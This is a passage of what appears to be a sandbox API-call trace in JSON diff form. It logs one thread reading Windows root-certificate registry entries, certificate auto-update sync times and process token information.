\\xda\\xb6\\xad\\xdd\\x08vr\\xf9\\x88\\xb4\\xbb\\xfd\\x15LK\\x130\\x1f\\x06\t`\\x86H\\x01\\x86\\xfdl\\x02\\x010\\x120\\x10\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x01\\x01\\x03\\x02\\x00\\xc00\\x1b\\x06\\x05g\\x81\\x0c\\x01\\x030\\x120\\x10\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x01\\x01\\x03\\x02\\x00\\xc0\\\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x0f:\\x05'\\xd2B\\xde-\\xc9\\x8e\\\\xfc\\xb1\\xe9\\x91\\xee \\x00\\x00\\x00\\x01\\x00\\x00\\x00\\xb3\\x03\\x00\\x000\\x82\\x03\\xaf0\\x82\\x02\\x97\\xa0\\x03\\x02\\x01\\x02\\x02\\x10\\x08;\\xe0V\\x90BF\\xb1\\xa1uj\\xc9Y\\x91\\xc7J0\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x05\\x05\\x00" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\\Blob" + } + ], + "repeated": 0, + "id": 2922 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fd269", + "parentcaller": "0x756ac71b", + "category": "registry", + "api": "NtEnumerateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006d0" + }, + { + "name": "Index", + "value": "6" + } + ], + "repeated": 0, + "id": 2923 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006b8" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x000006d0" + }, + { + "name": "ObjectAttributesName", + "value": "B1BC968BD4F49D622AA89A81F2150152A41D829C" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\B1BC968BD4F49D622AA89A81F2150152A41D829C" + } + ], + "repeated": 0, + "id": 2924 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffff80000005", + "pretty_return": "BUFFER_OVERFLOW", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006b8" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\B1BC968BD4F49D622AA89A81F2150152A41D829C\\Blob" + } + ], + "repeated": 1, + "id": 2925 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc63b", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006b8" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "Type", + "value": "3", + "pretty_value": "REG_BINARY" + }, + { + "name": "Information", + "value": "\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\xa8#\\xb4\\xa2\\x01\\x80\\xbe\\xb4`\\xca\\xb9U\\xc2M~!\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\xb1\\xbc\\x96\\x8b\\xd4\\xf4\\x9db*\\xa8\\x9a\\x81\\xf2\\x15\\x01R\\xa4\\x1d\\x82\\x9c~\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x04+\\xebw\\xd5\\x01z\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0c\\x00\\x00\\x000\n\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\t\\x7f\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0c\\x00\\x00\\x000\n\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\t\\x1d\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00n\\xe7\\xf3\\xb0`\\xd1\\x0e\\x90\\xa3\\x1b\\xa3G\\x1b\\x99\\x926\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00`{f\\x1aE\r\\x97\\xca\\x89P/}\\x04\\xcd4\\xa8\\xff\\xfc\\xfdKb\\x00\\x00\\x00\\x01\\x00\\x00\\x00 \\x00\\x00\\x00\\xeb\\xd4\\x10@\\xe4\\xbb>\\xc7B\\xc9\\xe3\\x81\\xd3\\x1e\\xf2\\xa4\\x1aH\\xb6h\\\\x96\\xe7\\xce\\xf3\\xc1\\xdfl\\xd43\\x1c\\x99\\x0b\\x00\\x00\\x00\\x01\\x00\\x00\\x000\\x00\\x00\\x00G\\x00l\\x00o\\x00b\\x00a\\x00l\\x00S\\x00i\\x00g\\x00n\\x00 \\x00R\\x00o\\x00o\\x00t\\x00 \\x00C\\x00A\\x00 \\x00-\\x00 \\x00R\\x001\\x00\\x00\\x00S\\x00\\x00\\x00\\x01\\x00\\x00\\x00@\\x00\\x00\\x000>0\\x1f\\x06\t+\\x06\\x01\\x04\\x01\\xa02\\x01\\x010\\x120\\x10\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x01\\x01\\x03\\x02\\x00\\xc00\\x1b\\x06\\x05g\\x81\\x0c\\x01\\x030\\x120\\x10\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x01\\x01\\x03\\x02\\x00\\xc0\t\\x00\\x00\\x00\\x01\\x00\\x00\\x00h\\x00\\x00\\x000f\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x02\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x03\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x03\\x04\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x04\\x06\\x08+\\x06\\x01\\x05\\x05\\x08\\x02\\x02\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x06\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x07\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\t\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x01\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x08\\x0f\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00Zm\\x07\\xb67\\x1d\\x96j/\\xb6\\xba\\x92\\x82\\x8c\\xe5Q" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\B1BC968BD4F49D622AA89A81F2150152A41D829C\\Blob" + } + ], + "repeated": 0, + "id": 2926 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fd269", + "parentcaller": "0x756ac71b", + "category": "registry", + "api": "NtEnumerateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006d0" + }, + { + "name": "Index", + "value": "7" + } + ], + "repeated": 0, + "id": 2927 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006b8" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x000006d0" + }, + { + "name": "ObjectAttributesName", + "value": "DF3C24F9BFD666761B268073FE06D1CC8D4F82A4" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4" + } + ], + "repeated": 0, + "id": 2928 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffff80000005", + "pretty_return": "BUFFER_OVERFLOW", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006b8" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\\Blob" + } + ], + "repeated": 1, + "id": 2929 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc63b", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006b8" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "Type", + "value": "3", + "pretty_value": "REG_BINARY" + }, + { + "name": "Information", + "value": "\\\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x14\\xc3\\xbd5I\\xee\"Z\\xec\\xe174\\xad\\x8c\\xa0\\xb8\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\xdf<$\\xf9\\xbf\\xd6fv\\x1b&\\x80s\\xfe\\x06\\xd1\\xcc\\x8dO\\x82\\xa4~\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x80\\xc8+h\\x86\\xd7\\x01\\x7f\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0c\\x00\\x00\\x000\n\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x03\\x1d\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00}\\xc3\\x0b\\xc9tiU`\\xa2\\xf0\t\neEUl\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00N\"T \\x18\\x95\\xe6\\xe3n\\xe6\\x0f\\xfa\\xfa\\xb9\\x12\\xed\\x06\\x17\\x8f9b\\x00\\x00\\x00\\x01\\x00\\x00\\x00 \\x00\\x00\\x00\\xcb<\\xcb\\xb7`1\\xe5\\xe0\\x13\\x8f\\x8d\\xd3\\x9a#\\xf9\\xdeG\\xff\\xc3^C\\xc1\\x14L\\xea'\\xd4jZ\\xb1\\xcb_\\x0b\\x00\\x00\\x00\\x01\\x00\\x00\\x000\\x00\\x00\\x00D\\x00i\\x00g\\x00i\\x00C\\x00e\\x00r\\x00t\\x00 \\x00G\\x00l\\x00o\\x00b\\x00a\\x00l\\x00 \\x00R\\x00o\\x00o\\x00t\\x00 \\x00G\\x002\\x00\\x00\\x00\t\\x00\\x00\\x00\\x01\\x00\\x00\\x004\\x00\\x00\\x0002\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x02\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x03\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x04\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x01\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x08S\\x00\\x00\\x00\\x01\\x00\\x00\\x00@\\x00\\x00\\x000>0\\x1f\\x06\t`\\x86H\\x01\\x86\\xfdl\\x02\\x010\\x120\\x10\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x01\\x01\\x03\\x02\\x00\\xc00\\x1b\\x06\\x05g\\x81\\x0c\\x01\\x030\\x120\\x10\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x01\\x01\\x03\\x02\\x00\\xc0\\x0f\\x00\\x00\\x00\\x01\\x00\\x00\\x00 \\x00\\x00\\x00KN\\xb4\\xb0t)\\x8b\\x82\\x8b\\\\x000\\x95\\xa1\\x0bE#\\xfb\\x95\\x1c\\x0c\\x884\\x8b\t\\xc5>[\\xab\\xa4\\x08\\xa3\\x04\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\xe4\\xa6\\x8a\\xc8T\\xacRBF\n\\xfdrH\\x1b*D \\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x92\\x03\\x00\\x000\\x82\\x03\\x8e" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\\Blob" + } + ], + "repeated": 0, + "id": 2930 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006d0" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000053c" + }, + { + "name": "ObjectAttributesName", + "value": "CRLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\CRLs" + } + ], + "repeated": 0, + "id": 2931 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006d0" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 2932 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006d0" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000053c" + }, + { + "name": "ObjectAttributesName", + "value": "CTLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\CTLs" + } + ], + "repeated": 0, + "id": 2933 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006d0" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 2934 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756b8c89", + "parentcaller": "0x767f0c49", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 47, + "id": 2935 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 2936 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006d0" + }, + { + "name": "DesiredAccess", + "value": "0x00020119", + "pretty_value": "KEY_QUERY_VALUE|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|KEY_WOW64_64KEY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate" + } + ], + "repeated": 0, + "id": 2937 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006d0" + }, + { + "name": "ValueName", + "value": "DisallowedCertLastSyncTime" + }, + { + "name": "Type", + "value": "3", + "pretty_value": "REG_BINARY" + }, + { + "name": "Information", + "value": "\\xec\\xdbPA\\xa1\\x8f\\xdb\\x01" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate\\DisallowedCertLastSyncTime" + } + ], + "repeated": 0, + "id": 2938 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x767e81e7", + "parentcaller": "0x767e8153", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 2939 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756b7eb6", + "parentcaller": "0x767e8775", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "29" + }, + { + "name": "TokenInformation", + "value": "\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 2940 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756ba174", + "parentcaller": "0x768087e5", + "category": "process", + "api": "NtOpenProcessToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "DesiredAccess", + "value": "0x00000008" + }, + { + "name": "TokenHandle", + "value": "0x000006d0" + } + ], + "repeated": 0, + "id": 2941 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756b7eb6", + "parentcaller": "0x76808ab9", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "1" + }, + { + "name": "TokenInformation", + "value": "\\xb8\\xee[\\x05\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xaa\tT\\x1e\\xa0\\x13}z\\xa7\\x1b\\x0f\\xf2\\xe9\\x03\\x00\\x00K?\\xd6\\xfat\\xa1ku\\x88\\x8f's\\xe5\\x87\\x80v+\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\x00\\x00\\\\x05\\x00\\x00\\x00\\x00\\xd4\\xee[\\x05\\xe0\\xef[\\x05\\xa4\\xfd[\\x05\\x90c\\x1bst\\xa1ku\\x88\\x8f'sP\\xef[\\x05\\xdb\\x9e\\x06slS%s$\\xb6,s\\xbcA\\x83\\x02\\x88\\x8f's\\xa0\\xef[\\x05\\x03?\\xd6\\xfa\\x84\\xea[\\x05\\x04\\xa0\\x04s\\xa4\\xfd[\\x05\\x90c\\x1bs\\xdf!\\xab\\x8c\\xfe\\xff\\xff\\xff\\x9c\\xef[\\x05\\xe6\\xb5\\x07s9\\x00\\x00\\x00\\xbc\\x9a%s\\xdc\\xb5%s\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd7\\xb5%s\\x9c\\xb3%s\\xff\\xff\\xff\\xff0~%s\\x08\\x00\\x00\\x00\\xc8\\xb5%s\\xdc\\xef[\\x058\\xf2\\xfc\\xef\\x9c\\xef\\x8c\\xef\\x00\\xf0\\x00\\x00<\\xff\\x00\\x008\\xf2[\\x05\\xfc\\xef[\\x05\\x00\\xf0[\\x05\\x00\\x00\\x00\\x00\\xb0\\xef[\\x05t\\xa1ku\\xff\\xff\\xff\\xff\\x08\\x00\\x00\\x00\\xdc\\xef[\\x05" + } + ], + "repeated": 0, + "id": 2942 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 2943 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006d0" + }, + { + "name": "DesiredAccess", + "value": "0x02000000", + "pretty_value": "MAXIMUM_ALLOWED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x000002ac" + }, + { + "name": "ObjectAttributesName", + "value": "S-1-5-21-508823978-2055017376-4061076391-1001" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER" + } + ], + "repeated": 0, + "id": 2944 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006b8" + }, + { + "name": "DesiredAccess", + "value": "0x00020119", + "pretty_value": "KEY_QUERY_VALUE|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|KEY_WOW64_64KEY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x000006d0" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\Software\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate" + } + ], + "repeated": 0, + "id": 2945 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006b8" + }, + { + "name": "ValueName", + "value": "DisallowedCertLastSyncTime" + }, + { + "name": "Type", + "value": "3", + "pretty_value": "REG_BINARY" + }, + { + "name": "Information", + "value": "\\xd0\\xae\\x0bA\\xa1\\x8f\\xdb\\x01" + }, + { + "name": "FullName", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate\\DisallowedCertLastSyncTime" + } + ], + "repeated": 0, + "id": 2946 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x767e81e7", + "parentcaller": "0x767e816f", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 2947 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 2948 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006b8" + }, + { + "name": "DesiredAccess", + "value": "0x00020119", + "pretty_value": "KEY_QUERY_VALUE|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|KEY_WOW64_64KEY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate" + } + ], + "repeated": 0, + "id": 2949 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000006b8" + }, + { + "name": "ValueName", + "value": "LastSyncTime" + }, + { + "name": "Type", + "value": "3", + "pretty_value": "REG_BINARY" + }, + { + "name": "Information", + "value": "\\xae\\xcb\\xeaM\\xa1\\x8f\\xdb\\x01" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate\\LastSyncTime" + } + ], + "repeated": 0, + "id": 2950 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x767e81e7", + "parentcaller": "0x767e8153", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 2951 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756b7eb6", + "parentcaller": "0x767e8775", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "29" + }, + { + "name": "TokenInformation", + "value": "\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 2952 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756ba174", + "parentcaller": "0x768087e5", + "category": "process", + "api": "NtOpenProcessToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "DesiredAccess", + "value": "0x00000008" + }, + { + "name": "TokenHandle", + "value": "0x000006b8" + } + ], + "repeated": 0, + "id": 2953 + }, + { + "timestamp": "2025-03-07 21:41:29,734", + "thread_id": "7084", + "caller": "0x756b7eb6", + "parentcaller": "0x76808ab9", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "1" + }, + { + "name": "TokenInformation", + "value": "\\xb8\\xee[\\x05\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xaa\tT\\x1e\\xa0\\x13}z\\xa7\\x1b\\x0f\\xf2\\xe9\\x03\\x00\\x00K?\\xd6\\xfat\\xa1ku\\x88\\x8f's\\xe5\\x87\\x80v+\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\x00\\x00\\\\x05\\x00\\x00\\x00\\x00\\xd4\\xee[\\x05\\xe0\\xef[\\x05\\xa4\\xfd[\\x05\\x90c\\x1bst\\xa1ku\\x88\\x8f'sP\\xef[\\x05\\xdb\\x9e\\x06slS%s$\\xb6,s\\xbcA\\x83\\x02\\x88\\x8f's\\xa0\\xef[\\x05\\x03?\\xd6\\xfa\\x84\\xea[\\x05\\x04\\xa0\\x04s\\xa4\\xfd[\\x05\\x90c\\x1bs\\xdf!\\xab\\x8c\\xfe\\xff\\xff\\xff\\x9c\\xef[\\x05\\xe6\\xb5\\x07s9\\x00\\x00\\x00\\xbc\\x9a%s\\xdc\\xb5%s\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd7\\xb5%s\\x9c\\xb3%s\\xff\\xff\\xff\\xff0~%s\\x08\\x00\\x00\\x00\\xc8\\xb5%s\\xdc\\xef[\\x058\\xf2\\xfc\\xef\\x9c\\xef\\x8c\\xef\\x00\\xf0\\x00\\x00<\\xff\\x00\\x008\\xf2[\\x05\\xfc\\xef[\\x05\\x00\\xf0[\\x05\\x00\\